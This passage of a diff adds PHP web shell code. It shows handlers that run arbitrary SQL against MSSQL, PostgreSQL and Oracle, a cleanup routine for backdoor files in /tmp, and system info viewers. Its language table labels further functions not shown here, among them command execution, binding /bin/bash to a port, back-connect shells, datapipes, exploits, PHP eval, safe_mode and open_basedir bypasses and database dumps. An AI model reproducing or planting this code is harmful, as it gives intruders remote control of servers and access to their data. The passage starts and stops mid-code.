+ $sql .= $sql2;
+ echo $sql;
+ echo "</table><br>";
+ }
+ /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+ @mssql_free_result($res);
+ }
+ }
+ @mssql_close($db);
+ }
+ else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+ $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+ $db = @pg_connect($str);
+ if($db)
+ {
+ $querys = @explode(';',$_POST['db_query']);
+ foreach($querys as $num=>$query)
+ {
+ if(strlen($query)>5){
+ echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+ $res = @pg_query($db,$query);
+ $error = @pg_errormessage($db);
+ if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+ else {
+ if (@pg_num_rows($res) > 0)
+ {
+ $sql2 = $sql = $keys = $values = '';
+ while (($row = @pg_fetch_assoc($res)))
+ {
+ $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+ $values = @array_values($row);
+ foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+ $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+ $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+ }
+ echo "<table width=100%>";
+ $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+ $sql .= $sql2;
+ echo $sql;
+ echo "</table><br>";
+ }
+ else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+ }
+ @pg_free_result($res);
+ }
+ }
+ @pg_close($db);
+ }
+ else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+ break;
+ case 'Oracle':
+ $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+ if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+ else
+ {
+ $querys = @explode(';',$_POST['db_query']);
+ foreach($querys as $num=>$query)
+ {
+ if(strlen($query)>5) {
+ echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+ $stat = @ociparse($db, $query);
+ @ociexecute($stat);
+ if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+ else
+ {
+ $rowcount = @ocirowcount($stat);
+ if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+ else {
+ echo "<table width=100%><tr>";
+ for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+ echo "</tr>";
+ while(ocifetch($stat))
+ {
+ echo "<tr>";
+ for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+ echo "</tr>";
+ }
+ echo "</table><br>";
+ }
+ @ocifreestatement($stat);
+ }
+ }
+ }
+ @ocilogoff($db);
+ }
+ break;
+ }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['tmp']))
+ {
+ @unlink("/tmp/bdpl");
+ @unlink("/tmp/back");
+ @unlink("/tmp/bd");
+ @unlink("/tmp/bd.c");
+ @unlink("/tmp/dp");
+ @unlink("/tmp/dpc");
+ @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+ {
+ $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+ }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+ echo $head;
+ echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+ $cpuf = @file("cpuinfo");
+ if($cpuf)
+ {
+ $c = @sizeof($cpuf);
+ for($i=0;$i<$c;$i++)
+ {
+ $info = @explode(":",$cpuf[$i]);
+ if($info[1]==""){ $info[1]="---"; }
+ $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+ }
+ echo $r;
+ }
+ else
+ {
+ echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+ }
+ echo '</table>';
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+ die();
+ }
+if(isset($_GET['mem']))
+ {
+ echo $head;
+ echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+ $memf = @file("meminfo");
+ if($memf)
+ {
+ $c = sizeof($memf);
+ for($i=0;$i<$c;$i++)
+ {
+ $info = explode(":",$memf[$i]);
+ if($info[1]==""){ $info[1]="---"; }
+ $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+ }
+ echo $r;
+ }
+ else
+ {
+ echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+ }
+ echo '</table>';
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+ die();
+ }
+/*
+&#1042;&#1099;&#1073;&#1086;&#1088; &#1103;&#1079;&#1099;&#1082;&#1072;
+$language='eng' - &#1088;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081;
+$language='ru' - &#1072;&#1085;&#1075;&#1083;&#1080;&#1081;&#1089;&#1082;&#1080;&#1081;
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1085;&#1072;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;',
+'ru_text2' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;',
+'ru_text3' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1091;',
+'ru_text4'
=>'&#1056;&#1072;&#1073;&#1086;&#1095;&#1072;&#1103; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103;', +'ru_text5' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;', +'ru_text6' =>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;', +'ru_text7' =>'&#1040;&#1083;&#1080;&#1072;&#1089;&#1099;', +'ru_text8' =>'&#1042;&#1099;&#1073;&#1077;&#1088;&#1080;&#1090;&#1077; &#1072;&#1083;&#1080;&#1072;&#1089;', +'ru_butt1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;', +'ru_butt2' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1080;&#1090;&#1100;', +'ru_text9' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1080;&#1077; &#1087;&#1086;&#1088;&#1090;&#1072; &#1080; &#1087;&#1088;&#1080;&#1074;&#1103;&#1079;&#1082;&#1072; &#1077;&#1075;&#1086; &#1082; /bin/bash', +'ru_text10'=>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100; &#1087;&#1086;&#1088;&#1090;', +'ru_text11'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072;', +'ru_butt3' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100;', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-&#1072;&#1076;&#1088;&#1077;&#1089;', +'ru_text14'=>'&#1055;&#1086;&#1088;&#1090;', +'ru_butt4' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;', +'ru_text15'=>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1089; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1086;&#1075;&#1086; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;', +'ru_text16'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;', +'ru_text17'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;', 
+'ru_text18'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;', +'ru_text19'=>'Exploits', +'ru_text20'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;', +'ru_text21'=>'&#1053;&#1086;&#1074;&#1086;&#1077; &#1080;&#1084;&#1103;', +'ru_text22'=>'datapipe', +'ru_text23'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;', +'ru_text24'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1093;&#1086;&#1089;&#1090;', +'ru_text25'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;', +'ru_text26'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;', +'ru_butt5' =>'&#1047;&#1072;&#1087;&#1091;&#1089;&#1090;&#1080;&#1090;&#1100;', +'ru_text28'=>'&#1056;&#1072;&#1073;&#1086;&#1090;&#1072; &#1074; safe_mode', +'ru_text29'=>'&#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1079;&#1072;&#1087;&#1088;&#1077;&#1097;&#1077;&#1085;', +'ru_butt6' =>'&#1057;&#1084;&#1077;&#1085;&#1080;&#1090;&#1100;', +'ru_text30'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1092;&#1072;&#1081;&#1083;&#1072;', +'ru_butt7' =>'&#1042;&#1099;&#1074;&#1077;&#1089;&#1090;&#1080;', +'ru_text31'=>'&#1060;&#1072;&#1081;&#1083; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;', +'ru_text32'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; PHP &#1082;&#1086;&#1076;&#1072;', +'ru_text33'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; open_basedir &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1080; cURL', +'ru_butt8' =>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1080;&#1090;&#1100;', 
+'ru_text34'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1102; include', +'ru_text35'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1079;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1091; &#1092;&#1072;&#1081;&#1083;&#1072; &#1074; mysql', +'ru_text36'=>'&#1041;&#1072;&#1079;&#1072;', +'ru_text37'=>'&#1051;&#1086;&#1075;&#1080;&#1085;', +'ru_text38'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100;', +'ru_text39'=>'&#1058;&#1072;&#1073;&#1083;&#1080;&#1094;&#1072;', +'ru_text40'=>'&#1044;&#1072;&#1084;&#1087; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;', +'ru_butt9' =>'&#1044;&#1072;&#1084;&#1087;', +'ru_text41'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1077;', +'ru_text42'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072;', +'ru_text43'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083;', +'ru_butt10'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100;', +'ru_butt11'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100;', +'ru_text44'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072; 
&#1085;&#1077;&#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;! &#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1076;&#1083;&#1103; &#1095;&#1090;&#1077;&#1085;&#1080;&#1103;!', +'ru_text45'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1093;&#1088;&#1072;&#1085;&#1077;&#1085;', +'ru_text46'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; phpinfo()', +'ru_text47'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1085;&#1072;&#1089;&#1090;&#1088;&#1086;&#1077;&#1082; php.ini', +'ru_text48'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1074;&#1088;&#1077;&#1084;&#1077;&#1085;&#1085;&#1099;&#1093; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074;', +'ru_text49'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1072; &#1089; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;', +'ru_text50'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1088;&#1086;&#1094;&#1077;&#1089;&#1089;&#1086;&#1088;&#1077;', +'ru_text51'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1072;&#1084;&#1103;&#1090;&#1080;', +'ru_text52'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;', +'ru_text53'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;', +'ru_text54'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;', +'ru_butt12'=>'&#1053;&#1072;&#1081;&#1090;&#1080;', +'ru_text55'=>'&#1058;&#1086;&#1083;&#1100;&#1082;&#1086; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;', +'ru_text56'=>'&#1053;&#1080;&#1095;&#1077;&#1075;&#1086; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;&#1086;', +'ru_text57'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100; 
&#1060;&#1072;&#1081;&#1083;/&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;', +'ru_text58'=>'&#1048;&#1084;&#1103;', +'ru_text59'=>'&#1060;&#1072;&#1081;&#1083;', +'ru_text60'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;', +'ru_butt13'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;', +'ru_text61'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;', +'ru_text62'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;&#1072;', +'ru_text63'=>'&#1060;&#1072;&#1081;&#1083; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;', +'ru_text64'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1072;', +'ru_text65'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;', +'ru_text66'=>'&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'&#1050;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;', +'ru_text69'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;1', +'ru_text70'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;2', +'ru_text71'=>"&#1042;&#1090;&#1086;&#1088;&#1086;&#1081; &#1087;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;:\r\n- &#1076;&#1083;&#1103; CHOWN - &#1080;&#1084;&#1103; &#1085;&#1086;&#1074;&#1086;&#1075;&#1086; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; &#1080;&#1083;&#1080; &#1077;&#1075;&#1086; UID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHGRP - &#1080;&#1084;&#1103; &#1075;&#1088;&#1091;&#1087;&#1087;&#1099; &#1080;&#1083;&#1080; GID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHMOD - 
&#1094;&#1077;&#1083;&#1086;&#1077; &#1095;&#1080;&#1089;&#1083;&#1086; &#1074; &#1074;&#1086;&#1089;&#1100;&#1084;&#1077;&#1088;&#1080;&#1095;&#1085;&#1086;&#1084; &#1087;&#1088;&#1077;&#1076;&#1089;&#1090;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1080; (&#1085;&#1072;&#1087;&#1088;&#1080;&#1084;&#1077;&#1088; 0777)", +'ru_text72'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;', +'ru_text73'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;', +'ru_text74'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;', +'ru_text75'=>'* &#1084;&#1086;&#1078;&#1085;&#1086; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100; &#1088;&#1077;&#1075;&#1091;&#1083;&#1103;&#1088;&#1085;&#1086;&#1077; &#1074;&#1099;&#1088;&#1072;&#1078;&#1077;&#1085;&#1080;&#1077;', +'ru_text76'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093; &#1089; &#1087;&#1086;&#1084;&#1086;&#1097;&#1100;&#1102; &#1091;&#1090;&#1080;&#1083;&#1080;&#1090;&#1099; find', +'ru_text77'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1089;&#1090;&#1088;&#1091;&#1082;&#1090;&#1091;&#1088;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;', +'ru_text78'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099;', +'ru_text79'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1089;&#1090;&#1086;&#1083;&#1073;&#1094;&#1099;', +'ru_text80'=>'&#1058;&#1080;&#1087;', +'ru_text81'=>'&#1057;&#1077;&#1090;&#1100;', +'ru_text82'=>'&#1041;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;', +'ru_text83'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1072;', 
+'ru_text84'=>'SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;', +'ru_text85'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1074; MSSQL &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', 
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
